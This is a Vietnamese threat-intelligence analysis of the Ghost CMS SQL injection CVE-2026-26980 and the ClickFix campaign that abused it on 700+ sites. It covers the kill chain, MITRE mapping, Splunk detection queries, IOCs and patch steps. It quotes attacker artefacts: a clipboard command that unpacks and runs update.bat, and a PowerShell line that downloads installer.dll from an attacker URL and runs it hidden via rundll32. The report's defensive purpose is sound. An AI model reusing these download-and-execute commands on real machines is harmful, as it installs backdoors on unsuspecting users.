CVE-2026-26980: SQL Injection bị khai thác trong chiến dịch ClickFix, nhiều website lớn trở thành điểm phát tán mã độc.
Tổng quan (Executive Summary)
Hơn 700 website chạy Ghost CMS đang là nạn nhân của một chiến dịch "đầu độc" quy mô lớn. Kẻ tấn công khai thác CVE-2026-26980, lỗ hổng SQL Injection nghiêm trọng trong Content API của Ghost CMS, để lấy Admin API Key không cần xác thực. Với key này, toàn bộ bài viết trên website bị chỉnh sửa hàng loạt, nhúng JavaScript loader độc hại để tấn công ClickFix giả mạo Cloudflare nhắm vào người dùng cuối.
Danh sách nạn nhân bao gồm tên tuổi lớn như Harvard University, Oxford University, Auburn University, và DuckDuckGo. Người dùng truy cập các website có uy tín này đối mặt với trang xác thực Cloudflare giả, bị dụ tự thực thi lệnh PowerShell để cài backdoor dưới dạng ứng dụng Electron. Bản vá đã được phát hành từ 19/2/2026 (phiên bản 6.19.1), nhưng đến cuối tháng 5/2026 vẫn còn hàng trăm website chưa cập nhật. Hành động ưu tiên ngay lập tức: nâng cấp Ghost CMS lên phiên bản 6.19.1 và rotate toàn bộ Admin API Key.
Bối cảnh chiến dịch
Ghost CMS và vai trò trong hệ sinh thái web
Ghost là nền tảng CMS mã nguồn mở viết bằng Node.js, tập trung vào publishing, newsletter, và membership, hiện đang cung cấp hơn 100.000 website. Hai loại key trong kiến trúc API của Ghost liên quan trực tiếp đến chiến dịch này.
Content API Key được thiết kế để public, cho phép frontend đọc nội dung đã xuất bản mà không cần đăng nhập. Admin API Key có quyền quản trị đầy đủ, bao gồm endpoint PUT /ghost/api/admin/posts/:id/ để sửa đổi trực tiếp tất cả bài viết. Sự phân tách quyền này hợp lý theo thiết kế, nhưng CVE-2026-26980 phá vỡ ranh giới đó: kẻ tấn công khai thác Content API (không cần xác thực) để đọc Admin API Key trực tiếp từ database.
Lịch sử lỗ hổng CVE-2026-26980
Theo GitHub Security Advisory GHSA-w52v-v783-gw97, lỗ hổng được phát hiện bởi Anthropic sử dụng Claude AI, ảnh hưởng đến Ghost CMS từ phiên bản 3.24.0 đến 6.19.0. Ghost phát hành bản vá ngày 19/2/2026 trong phiên bản 6.19.1, bằng cách thay thế string concatenation trong slug filter ordering bằng parameterized query bindings.
Tám ngày sau khi bản vá ra mắt (27/2/2026), SentinelOne cảnh báo lỗ hổng đã bắt đầu bị khai thác trong thực tế. Đáng chú ý, DLL file installer.dll được tìm thấy trong chiến dịch mang compilation timestamp ngày 16/2/2026, tức là cùng ngày lỗ hổng được công bố nội bộ. Kẻ tấn công đã chuẩn bị payload trước khi bản vá chính thức ra mắt.
Thông tin chiến dịch
| Thuộc tính | Chi tiết |
|---|---|
| CVE | CVE-2026-26980 |
| CVSS | 9.4 Critical (GitHub/CNA) / 7.5 High (NIST) |
| CWE | CWE-89: Improper Neutralization of SQL |
| Phiên bản ảnh hưởng | Ghost CMS 3.24.0 đến 6.19.0 |
| Phiên bản vá | Ghost CMS 6.19.1 (phát hành 19/2/2026) |
| Số domain bị ảnh hưởng | Hơn 700 (tính đến 17/5/2026) |
| Số nhóm tấn công | Ít nhất 2 cluster độc lập |
| Phát hiện đầu tiên | 7/5/2026 bởi XLab (Qianxin) |
| Target sector | Blog cá nhân, SaaS/Tech, AI/ML, Giáo dục, Fintech, Media, Blockchain, Bảo mật |
| C2 chính (Threat Actor A) | clo4shara[.]xyz, com-apps[.]cc, web-telegram[.]ug |
| C2 chính (Threat Actor B) | staticcloudflare[.]pro, script-dev[.]digital, cdnupdatenews[.]top |
| Payload cuối | UtilifySetup.exe (Electron backdoor), installer.dll (Rust dropper) |
| Nguồn phát hiện | QiAnXin XLab, SentinelOne, BleepingComputer |
Timeline sự kiện
| Thời điểm | Sự kiện |
|---|---|
| 16/2/2026 | Compilation timestamp của installer.dll, cho thấy payload được chuẩn bị từ trước khi bản vá ra mắt |
| 19/2/2026 | Ghost CMS phát hành bản vá trong phiên bản 6.19.1 |
| 27/2/2026 | SentinelOne công bố chi tiết CVE-2026-26980 và cảnh báo đang bị khai thác thực tế |
| Tháng 4/2026 | Báo cáo công khai về Harvard International Review bị nhúng script ClickFix (IOC: script-dev[.]digital) bởi Threat Actor B |
| 7/5/2026 | XLab phát hiện sự cố đầu độc Ghost CMS nhắm vào một khách hàng, bắt đầu điều tra |
| 8/5/2026 | Threat Actor A cập nhật update.bat và thay đổi download chain |
| 10/5/2026 | XLab hoàn thành lần quét đầu, xác nhận 156 domain bị nhiễm; bắt đầu gửi thông báo |
| 16/5/2026 | Threat Actor A đổi Cloaking domain (clo4shara[.]xyz sang com-apps[.]cc) sau khi Cloudflare chặn; payload mới installer.dll giai đoạn 2 được triển khai |
| 17/5/2026 | XLab hoàn thành lần quét thứ hai, xác nhận 700+ domain, phát hiện Threat Actor B, quyết định công bố |
| 21/5/2026 | XLab phát hành báo cáo kỹ thuật đầy đủ |
| 25-26/5/2026 | BleepingComputer, The Hacker News, SecurityWeek, Malwarebytes đưa tin rộng rãi |
Timeline toàn bộ chiến dịch từ khi phát hiện đến khi công bố
Kill chain chi tiết
Toàn bộ attack chain gồm 5 giai đoạn: CMS Takeover, Page Poisoning, Two-stage Loading, FakeCAPTCHA/ClickFix, và Malware Delivery. Đây là chuỗi hoàn toàn tự động hóa: bulk vulnerability scan, tự động extract key, bulk injection, và dynamic C2 distribution.
Toàn bộ attack chain
Giai đoạn 1: CMS Takeover qua CVE-2026-26980
CVE-2026-26980 nằm trong slug filter ordering của Content API. Do Ghost sử dụng string concatenation khi xây dựng câu truy vấn SQL thay vì parameterized query, kẻ tấn công có thể inject SQL syntax vào tham số này mà không cần bất kỳ xác thực nào. Theo ghi nhận từ SentinelOne Vulnerability Database về CVE-2026-26980, kết quả là toàn bộ nội dung database có thể đọc được, bao gồm cả Admin API Key.
Admin API Key có quyền gọi endpoint PUT /ghost/api/admin/posts/:id/ để sửa đổi trực tiếp tất cả bài viết đã xuất bản. Đây là điều kiện cho phép giai đoạn tiếp theo. Lý do kẻ tấn công chọn kỹ thuật này thay vì các exploit phức tạp hơn rất đơn giản: Content API không có rate limiting nghiêm ngặt theo thiết kế, và Admin API Key được lưu trong cùng database với dữ liệu nội dung.
Giai đoạn 2: Page Poisoning qua Ghost Admin API
Sau khi có Admin API Key, kẻ tấn công gọi Admin API để inject JavaScript loader độc hại vào cuối mỗi bài viết. Loader được thiết kế dạng two-stage: phần cố định được ghi vào database, còn payload thực sự được trả về theo yêu cầu từ C2 tại runtime. Trong phiên bản mới hơn của loader, kẻ tấn công dùng localStorage để đảm bảo script chỉ chạy một lần trên cùng browser, giảm thiểu khả năng phát hiện.
Thiết kế này cho phép thay đổi payload (phishing redirect, information stealing, hoặc browser exploit) mà không cần xâm nhập lại website, chỉ cần cập nhật phía C2. Đây là điểm đặc trưng của một threat actor vận hành infrastructure chuyên nghiệp, không phải một chiến dịch chạy và bỏ.
Giai đoạn 3: Two-stage Cloaking Script
Loader trong bài viết kết nối đến C2 clo4shara[.]xyz/11z77u3.php (sau đó đổi sang com-apps[.]cc/11z77u3.php). Theo nghiên cứu, đây là PHP script từ Adspect, một dịch vụ cloaking thương mại, hỗ trợ 19 lệnh khác nhau để kiểm soát browser nạn nhân.
Script thu thập browser fingerprint từ nhiều chiều: WebGL graphics card model, Navigator properties, timezone, touch event support, và trạng thái console. Nếu visitor được xác định là mục tiêu thực (không phải crawler hay security scanner), C2 trả về lệnh iframe để load trang tiếp theo:
{
"ok": true,
"action": "iframe",
"cid": "69fca6a9ad57095d",
"js": false,
"target": "https://cloud-verification[.]com"
}
Việc sử dụng cloaking service thương mại là dấu hiệu đầu tư đáng kể, không phải công cụ homegrown. Khi Cloudflare chặn domain cũ vào khoảng ngày 10/5/2026, Threat Actor A chỉ cần đổi domain mới và toàn bộ chain hoạt động trở lại ngay lập tức.
Giai đoạn 4: FakeCAPTCHA ClickFix
Nạn nhân thấy trang xác thực Cloudflare giả được nhúng qua iframe. Trang này yêu cầu ba bước "xác minh": WIN+R, Ctrl+V, rồi Enter.
Trang giả mạo Cloudflare "Verify you are human" được nhúng qua iframe trên website hợp lệ
Điểm tinh vi nằm ở setTimeout: một hàm chạy ngầm sau ít nhất 500ms để tải file update.zip từ C2 trong nền, không có thông báo nếu browser tắt download notification. Nội dung được copy vào clipboard khi user click "Verify":
cmd /c "move %USERPROFILE%\Downloads\update.zip %TEMP%\u.zip
&& tar -xf %TEMP%\u.zip -C %TEMP%
&& start /min "" %TEMP%\update.bat"
& REM
* I am not a robot reCAPTCHA Verification ID:2771
Dòng REM * I am not a robot là chi tiết đáng chú ý: kẻ tấn công ngụy trang phần độc hại như reCAPTCHA verification code để người dùng không nghi ngờ khi nhìn vào nội dung paste.
ClickFix social engineering: ba bước "xác minh" thực chất là ba bước cài malware
Giai đoạn 5: Payload Delivery và Persistence
update.bat (hoặc NotepadPlusPlus.cmd/.js) download DLL từ Storj CDN, load qua rundll32.exe với entry point Begin, chạy trong hidden window, và mở một trang web giả để distract nạn nhân:
@echo off
powershell -W 1 -C "\(f=\)env:Temp+'\installer.dll'; iwr 'https://link.storjshare[.]io/raw/.../installer.dll' -OutFile \(f; Start-Process rundll32 -ArgumentList \)f,'Begin' -Window Hidden"
start "" "https://youtube.com"
installer.dll (viết bằng Rust) download UtilifySetup.exe từ S3 bucket của kẻ tấn công. Đây là Inno Setup installer của một Electron app được modify từ mã nguồn mở Grape desktop client. Kẻ tấn công thay thế file entry gốc bằng index.js độc hại, extract vào %AppData%\local\SuperMaxionQuickMaxlite\, dùng Electron's setLoginItemSettings API để thiết lập persistence khi user đăng nhập. Mỗi 30 giây, app gửi POST request đến web-telegram[.]ug để nhận lệnh từ C2, có thể execute arbitrary JavaScript hoặc chạy executable files tùy ý. Tại thời điểm phát hiện, UtilifySetup.exe có 0 detection trên VirusTotal.
Phân tích kỹ thuật chi tiết
Hai cluster tấn công song song
XLab xác nhận ít nhất hai nhóm tấn công độc lập cùng khai thác một lỗ hổng.
Threat Actor A là nhóm chính trong phần kill chain trên. Nhóm này sử dụng loader với fingerprint ghost_once_footer_ và Adspect cloaking chain. Giai đoạn đầu (7-9/5), payload cuối là PuTTY client hợp lệ với valid code-signing certificate. XLab đánh giá đây là giai đoạn test delivery chain, xác minh feasibility và conversion rate trước khi triển khai backdoor thực sự. Từ 16/5, payload được thay bằng UtilifySetup.exe là backdoor đầy đủ chức năng.
Threat Actor B sử dụng pattern khác: loader với string obfuscation kiểu reverse, stage 2 JavaScript từ domain theo URI pattern /api/css.js, và ClickFix command được mã hóa XOR với key h2QHiVI. Hai domain staticcloudflare[.]pro và script-dev[.]digital cùng resolve về IP 144.31.236.66, xác nhận cùng một nhóm. Theo ghi nhận từ VirusTrace trên VirusTotal, Threat Actor B có khả năng liên kết với nhóm Aeternum đã được theo dõi trước đây.
Harvard International Review là ví dụ điển hình cho tình trạng cạnh tranh giữa hai nhóm: website này bị Threat Actor A inject script vào ngày 16/5, rồi đúng 1 ngày sau (17/5), Threat Actor B xóa script của A và cài script của mình. XLab gọi đây là hành vi "tranh giành" website nạn nhân.
Tại sao CVSS score có sự khác biệt
NIST chấm CVE-2026-26980 là 7.5 High, trong khi GitHub CNA (là TryGhost) chấm 9.4 Critical. Sự khác biệt phản ánh context thực tế: score 7.5 phản ánh đặc điểm kỹ thuật của SQL Injection trong điều kiện tiêu chuẩn (đọc dữ liệu database), nhưng Ghost's Admin API Key là credential đặc biệt nguy hiểm vì nó cho phép write access toàn bộ nội dung website. CNA score 9.4 phản ánh đúng hơn mức độ impact thực tế của exploitation chain hoàn chỉnh.
Ý nghĩa của việc sử dụng website uy tín
ClickFix thành công hay không phụ thuộc phần lớn vào mức độ tin tưởng của nạn nhân vào website họ đang truy cập. Khi trang xác thực Cloudflare giả xuất hiện trên harvard.edu hay duckduckgo.com, người dùng có xu hướng không đặt câu hỏi. Đây chính xác là lý do các website có uy tín cao là mục tiêu lý tưởng, không phải vì dữ liệu bên trong chúng. Theo theo Ghost CMS Mass Compromised via CVE-2026-26980, phần lớn các thông báo XLab gửi đến nạn nhân tính đến 17/5/2026 vẫn chưa nhận được phản hồi.
700+ domain bị nhiễm phân bố trên nhiều ngành, với Personal Blog chiếm 48.1% và SaaS/Tech Blog chiếm 14.8%
MITRE ATT&CK Mapping
| Tactic | Technique ID | Technique Name | Triển khai trong chiến dịch |
|---|---|---|---|
| Initial Access | T1190 | Exploit Public-Facing Application | Khai thác CVE-2026-26980 (SQL Injection) trong Ghost Content API để extract Admin API Key, không cần xác thực |
| Initial Access | T1189 | Drive-by Compromise | JavaScript độc hại chạy trong browser của người dùng khi họ truy cập bài viết trên website Ghost CMS đã bị nhiễm |
| Credential Access | T1552 | Unsecured Credentials | Admin API Key được đọc trực tiếp từ database Ghost qua SQL Injection, không qua cơ chế xác thực |
| Persistence | T1659 | Content Injection | Nhúng JavaScript loader độc hại vào cuối các bài viết Ghost CMS thông qua Ghost Admin API (PUT /ghost/api/admin/posts/:id/) |
| Persistence | T1547 | Boot/Logon Autostart Execution | UtilifySetup.exe dùng Electron setLoginItemSettings API để đăng ký chạy tự động khi user đăng nhập |
| Defense Evasion | T1027 | Obfuscated Files or Information | Loader encode C2 domain bằng Base64; ClickFix command encode Base64; Threat Actor B mã hóa XOR với key h2QHiVI |
| Defense Evasion | T1036 | Masquerading | DLL đặt tên NotepadPlusPlus.dll để giả mạo plugin hợp lệ; payload Stage 1 là PuTTY client có valid code-signing certificate |
| Defense Evasion | T1218.011 | System Binary Proxy Execution: Rundll32 | rundll32.exe load installer.dll với exported function Begin, chạy với hidden window |
| Defense Evasion | T1564.003 | Hide Artifacts: Hidden Window | PowerShell flag -W 1; start /min để ẩn cửa sổ execution |
| Defense Evasion | T1568 | Dynamic Resolution | Cloaking domain được thay đổi (clo4shara[.]xyz sang com-apps[.]cc) sau khi Cloudflare chặn; payload C2-side swappable không cần tái xâm nhập site |
| Execution | T1204.002 | User Execution: Malicious File | ClickFix social engineering lừa nạn nhân tự dán và chạy lệnh CMD/PowerShell để cài malware |
| Execution | T1059.001 | Command and Scripting Interpreter: PowerShell | PowerShell tải installer.dll từ Storj CDN và execute qua rundll32 với hidden window |
| Execution | T1059.003 | Command and Scripting Interpreter: Windows Command Shell | Batch script update.bat / NotepadPlusPlus.cmd thực thi chuỗi download-and-execute |
| Discovery | T1082 | System Information Discovery | Adspect cloaking script thu thập WebGL, Navigator, timezone, touch event để fingerprint visitor và phân loại mục tiêu |
| Command and Control | T1071.001 | Application Layer Protocol: Web Protocols | UtilifySetup.exe poll C2 web-telegram[.]ug mỗi 30 giây qua HTTPS POST |
| Command and Control | T1219 | Remote Access Software | Modified Grape Electron app nhận lệnh để execute arbitrary JavaScript hoặc chạy executable files từ xa |
| Resource Development | T1583.001 | Acquire Infrastructure: Domains | Cloaking domains được mua và rotate: clo4shara[.]xyz, com-apps[.]cc, cloud-verification[.]com, web-telegram[.]ug |
Detection
Signal 1: Ghost Admin API bị gọi bulk trong thời gian ngắn (Ghost operators)
Đây là signal sớm nhất trong chuỗi tấn công và có false positive rate thấp. Người dùng hợp lệ không thường xuyên PUT nhiều bài viết liên tiếp trong vài phút.
index=web sourcetype=access_combined
(uri_path="/ghost/api/admin/posts/*" method="PUT")
| bucket _time span=5m
| stats count AS api_calls by clientip, useragent, _time
| where api_calls >= 5
| sort -api_calls
Signal 2: PowerShell download DLL về TEMP và gọi rundll32 (endpoint)
Pattern cốt lõi của Threat Actor A: PowerShell tải DLL bằng iwr hoặc Invoke-WebRequest, lưu vào TEMP, rồi rundll32 gọi exported function. Cần Windows Sysmon hoặc EDR có process creation logging.
index=windows (EventCode=4688 OR source="*sysmon*" EventCode=1)
(CommandLine="*iwr*" OR CommandLine="*Invoke-WebRequest*")
(CommandLine="*.dll*" AND (CommandLine="*Temp*" OR CommandLine="*APPDATA*"))
(CommandLine="*installer.dll*" OR CommandLine="*NotepadPlusPlus.dll*" OR CommandLine="*publl.dll*")
| eval technique = "T1059.001 + T1218.011"
| table _time, host, user, CommandLine, ParentCommandLine
Signal 3: Kết nối đến C2 domain đã biết (network / DNS)
index=dns OR index=network
query IN (
"clo4shara.xyz", "cloud-verification.com", "com-apps.cc",
"web-telegram.ug", "jalwat.com", "taketwolabs.com", "platecrumbs.com",
"staticcloudflare.pro", "script-dev.digital", "cdnupdatenews.top",
"updatesecurity.pro", "updatefilescf.top", "static-file.digital",
"download-file.today", "updatefile-cf.top"
)
| stats count by src_ip, query
| sort -count
Signal 4: Electron backdoor thiết lập persistence và polling C2 định kỳ (endpoint)
index=windows (EventCode=4688 OR source="*sysmon*" EventCode=1)
(CommandLine="*SuperMaxionQuickMaxlite*" OR ImagePath="*SuperMaxionQuickMaxlite*")
| eval technique = "T1547 + T1219"
| table _time, host, user, CommandLine
index=network dest="web-telegram.ug" http_method="POST"
| bucket _time span=1m
| stats count by src_ip, _time
| where count >= 2
| eval note = "Possible Electron backdoor C2 polling every 30s"
Signal 5: Phát hiện JavaScript injection fingerprint trong Ghost database (application layer)
Đây là detection trực tiếp nhất và có độ chính xác cao nhất cho Ghost operators. Nên chạy trực tiếp ở database level, không chỉ qua backend editor.
# Kiểm tra file system Ghost
grep -rn "ghost_once_footer_\|btoa(a.origin)\|sj\.ssc/ipa/" /var/www/ghost/content/
# Nếu dùng MySQL
mysql -u ghost_user -p ghost_db -e "
SELECT id, title, updated_at
FROM posts
WHERE html LIKE '%ghost_once_footer_%'
OR html LIKE '%btoa(a.origin)%'
OR html LIKE '%sj.ssc/ipa/%'
OR html LIKE '%clo4shara%'
OR html LIKE '%com-apps.cc%';
"
Nhận định
CVE-2026-26980 không phải lỗ hổng zero-day, nhưng chiến dịch này minh họa rõ ràng một pattern đang tăng tốc: thời gian từ patch disclosure đến exploitation trong thực tế đang ngày càng ngắn lại. DLL payload được compile từ ngày 16/2, tức là cùng ngày lỗ hổng được công bố. Kẻ tấn công theo dõi vulnerability disclosure và chuẩn bị tooling song song với chu kỳ patch của vendor.
Hai điểm kỹ thuật đáng chú ý nhất là cloaking architecture và cách khai thác uy tín của website. Loader two-stage với C2-side swappable payload là thiết kế cho phép kẻ tấn công adapt nhanh: khi Cloudflare chặn domain đầu tiên, 6 ngày sau chain hoạt động trở lại với domain mới. Đây không còn là công cụ đơn giản mà là infrastructure được vận hành liên tục và có nhân lực duy trì.
ClickFix đang trở thành initial access vector chủ đạo. Theo theo Think before you Click(Fix): Analyzing the ClickFix social engineering technique của Microsoft, technique này chiếm 47% initial access được theo dõi, vượt qua traditional phishing (35%). Số liệu từ Center for Internet Security về ClickFix cho thấy technique này đã xuất hiện trong hơn 1/3 tổng số alert từ Albert Network Monitoring trong nửa đầu 2025. Việc khai thác CMS vulnerabilities để tăng uy tín của ClickFix lure là một bước escalation logic: kẻ tấn công không cần xây dựng infrastructure mới, chỉ cần compromise các website đã có audience sẵn.
Điểm quan trọng nhất cho các tổ chức tại Việt Nam đang dùng Ghost CMS hoặc các nền tảng tương tự: unpatched CMS là entry point dễ dự đoán và dễ khai thác nhất trong toàn bộ attack surface. Không phải vì bản thân website có giá trị với kẻ tấn công, mà vì visitors của website đó mới là mục tiêu thực sự. Người dùng của bạn sẽ nhìn thấy trang Cloudflare verification trên domain họ tin tưởng và họ sẽ click.
Khuyến nghị
Immediate (0-24h):
- Nâng cấp Ghost CMS lên phiên bản 6.19.1 hoặc mới hơn.
- Rotate toàn bộ: Admin API Key, Content API Key, administrator password, và session tokens.
- Quét nội dung bài viết trong database để tìm fingerprint injection (xem signal 5). Làm ở database level, không chỉ kiểm tra qua backend editor vì editor có thể không render raw JavaScript.
- Block các IOC domain tại tầng DNS/firewall (xem danh sách IOC bên dưới).
Short-term (1-7 ngày):
- Rà soát access logs Admin API ít nhất 30 ngày trước để tìm dấu hiệu khai thác trước thời điểm phát hiện.
- Deploy detection rules cho PowerShell DLL download pattern (signal 2) và C2 communication pattern (signal 3 và 4).
- Thông báo cho người dùng đã truy cập website trong thời gian bị nhiễm để thực hiện local security check.
- Cân nhắc tắt tạm thời Ghost Content API nếu chưa thể patch, đặc biệt nếu API không cần thiết cho production.
Long-term:
- Thiết lập vulnerability management SLA rõ ràng cho CMS và web application: Critical (CVSS >= 9.0) patch trong vòng 72 giờ, High (CVSS >= 7.0) trong vòng 7 ngày.
- Triển khai WAF rule để detect SQL injection pattern trong Content API endpoint của Ghost.
- Đào tạo người dùng về ClickFix: không có website hợp lệ nào yêu cầu mở Command Prompt hoặc PowerShell để "xác minh danh tính".
- Triển khai Application Allowlisting hoặc Script Block Logging để phát hiện và ngăn chặn execution từ TEMP folder qua
rundll32.exe.
Indicators of Compromise
# ===== THREAT ACTOR A =====
# Domain (defanged)
clo4shara[.]xyz # Cloaking domain Phase 1 (bị Cloudflare chặn ~10/5)
cloud-verification[.]com # FakeCAPTCHA delivery
jalwat[.]com # update.zip hosting
com-apps[.]cc # Cloaking domain Phase 2 (thay thế sau khi bị chặn)
web-telegram[.]ug # C2 backdoor polling (UtilifySetup.exe, mỗi 30 giây)
platecrumbs[.]com # Cloaking domain (alternative)
taketwolabs[.]com # NotepadPlusPlus.dll hosting
# URL (defanged)
hxxps://clo4shara[.]xyz/11z77u3.php
hxxps://com-apps[.]cc/11z77u3.php
hxxps://platecrumbs[.]com/11z77u3.php
hxxps://cloud-verification[.]com/update.zip
hxxps://com-apps[.]cc/update.zip
hxxps://com-apps[.]cc/NotepadPlusPlus.zip
hxxps://jalwat[.]com/static/uploads/campaigns/6/update.zip
hxxps://taketwolabs[.]com/wp-content/NotepadPlusPlus.dll
# File Hash (MD5)
5659292833ec421da11ebde005d9c9a8 # installer.dll Stage 1 (Rust, compiled 2026-02-16)
d30cc10d54ebc967c8538ff74f442eee # installer.dll Stage 2 / NotepadPlusPlus.dll (compiled 2026-05-16)
18a7251ddde77ed24bc54700d84d9be1 # UtilifySetup.exe (Electron backdoor, 0 VT detections)
f280e12f51f996dae7fffc64a56ee527 # SuperAppizeSetup.msi (Inno Setup variant)
ec5dfee13abf94e08d0f94e90b527db0 # NotepadPlusPlus.js (JavaScript dropper)
# Host artifact
%AppData%\local\SuperMaxionQuickMaxlite\ # Thư mục cài đặt UtilifySetup.exe
# Code injection fingerprint
"ghost_once_footer_" # Threat Actor A loader marker
"btoa(a.origin)" # Hai stage loader identifier
# ===== THREAT ACTOR B =====
# Domain (defanged)
staticcloudflare[.]pro
script-dev[.]digital
script-dev[.]buzz
script-dev[.]xyz
updatesecurity[.]pro
updatefilescf[.]top
static-file[.]digital
download-file[.]today
updatefile-cf[.]top
updatefile-cf[.]dgital
cdnupdatenews[.]top
# IP
144.31.236.66 # Resolved bởi staticcloudflare[.]pro và script-dev[.]digital
# URL (defanged)
hxxps://staticcloudflare[.]pro/api/css.js
hxxps://script-dev[.]digital/api/css.js
hxxps://cdnupdatenews[.]top/dl?fid=38
# File Hash (MD5)
fceca579efcef09eb507c6ca977ea281 # css.js (obfuscated JS loader, XOR key h2QHiVI)
# Code injection fingerprint
"sj.ssc/ipa/" # Threat Actor B loader marker
Nguồn tham khảo:
- Ghost CMS SQL injection flaw exploited in large-scale ClickFix campaign — BleepingComputer
- Ghost CMS Mass Compromised via CVE-2026-26980, Now Fueling ClickFix Attacks — QiAnXin XLab (Qianxin)
- Ghost CMS CVE-2026-26980 Exploited to Hijack 700+ Sites for ClickFix Attacks — The Hacker News
- CVE-2026-26980 Ghost CMS Information Disclosure Flaw — SentinelOne
- Ghost Security Advisory GHSA-w52v-v783-gw97 — GitHub / TryGhost
- Ghost CMS Vulnerability Exploited to Hack Over 700 Websites — SecurityWeek
- Think before you Click(Fix): Analyzing the ClickFix social engineering technique — Microsoft Security Blog
- ClickFix: An Adaptive Social Engineering Technique — CIS (Center for Internet Security)
